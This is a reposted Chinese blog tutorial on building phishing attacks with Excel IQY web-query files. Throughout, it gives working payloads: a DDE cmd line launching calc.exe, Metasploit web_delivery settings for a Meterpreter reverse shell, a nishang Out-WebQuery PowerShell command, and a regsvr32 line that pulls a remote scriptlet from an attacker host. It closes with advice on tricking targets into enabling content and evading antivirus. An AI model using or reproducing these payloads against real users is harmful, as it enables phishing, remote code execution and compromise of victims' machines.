0x00 环境准备
1、操作系统:windows7
2、microsoft office版本:office 2010
0x01 了解IYQ的基本概念
可以将IYQ简单的理解成内置在excel中的一种特殊‘web浏览器’(不能加载脚本),通过IQY【即web查询】语句,可以直接将各类web上的列表数据轻松引入到当前的excel中,而正是因为这样,从而给了我们利用excel制作钓鱼邮件的机会,假如你要引入的web数据是入侵者事先准备好的一段payload iqy恶意代码,那结果就不言而喻了。
0x02 利用IYQ弹出计算器测试
一、在我们自己的服务器的网站目录下放一个payload.html文件,内容是IYQ代码
# IYQ代码
=cmd|'/c calc.exe '!A0
检验一下正常访问
接下来就是设置excel来拉取我们自己服务器上的payload文件
导入
点击“确定”
点击“是”过后,计算器程序被正常执行弹出
0x03 利用IYQ钓鱼弹shell测试
1、利用工具:
nishang:https://github.com/samratashok/nishang/releases2、在kali攻击机下准备好MSF的payload
use exploit/multi/script/web_delivery
set target 3
set payload windows/meterpreter/reverse_tcp_rc4_dns
set lhost 192.168.3.29
set lport 53
set rc4password secquan.org
exploit -j
3、利用Out-WebQuery脚本来生成iqy文件
iqy文件本身的内容很简单,只有一个包含恶意payload的url:http://192.168.80.131/meter.html ,关键也就在这个 html,我们需要把 html 的内容换成加载我们上面准备好的 meterpreter payload 的 iqy 语句 :regsvr32 /s /n /u /i:http://192.168.80.131:8080/ZXMgstpzpYQCJ.sct scrobj.dll),具体操作如下:
再用本次用来制作钓鱼文件的系统windown7执行如下命令:
powershell –exec bypass –Command "& {Import-Module 'C: ools
ishangClientOut-WebQuery.ps1';Out-WebQuery -URL http://192.168.80.131/meter.html}"
命令成功执行过后,会新生成一个iqy文件
打开我们的web服务器,在根目录下创建一个meter.html文件,并在其中写入msf生成的payload构造的iqy代码
root@kali:~# /etc/init.d/apache2 start
root@kali:~# /etc/init.d/apache2 start
[ ok ] Starting apache2 (via systemctl): apache2.service.
root@kali:~# cd /var/www/html/
root@kali:/var/www/html# vim meter.html
root@kali:/var/www/html# cat meter.html
=cmd|'/c regsvr32 /s /n /u /i:http://192.168.80.131:8080/ZXMgstpzpYQCJ.sct scrobj.dll '!A0
0x03 反弹shell
接下来就是引诱用户点击包含有IYQ漏洞的文件,一旦他正常双击打开[默认会调用 excel 来打开],便会弹出如下的安全警告框,至于怎么让他去点' enable '就需要用心好好琢磨下了
因为我们前面的 iqy 是用 cmd 执行的,所以这里它会问你是否要启动 cmd.exe,只要目标点击' 是',我们的 meterpreter 即会正常上线,具体如下
回到Kali的MSF上
发现meterpreter已成功上线
0x04 注意事项
-
实战中用 Out-WebQuery.ps1 脚本直接去生成 iqy,还有些不够灵活,如果能在 iqy 中先添加一些正常数据,看上去肯定会更逼真,自己多次实测暂未成功,待后续找到完美的解决办法之后,再更新上来
-
部分 AV,会侦测到此类的攻击,请务必做好相关免杀
文章转载至
https://www.cnblogs.com/ldhbetter/p/10893535.html
文章作者:
文刀问道(www.secquan.org)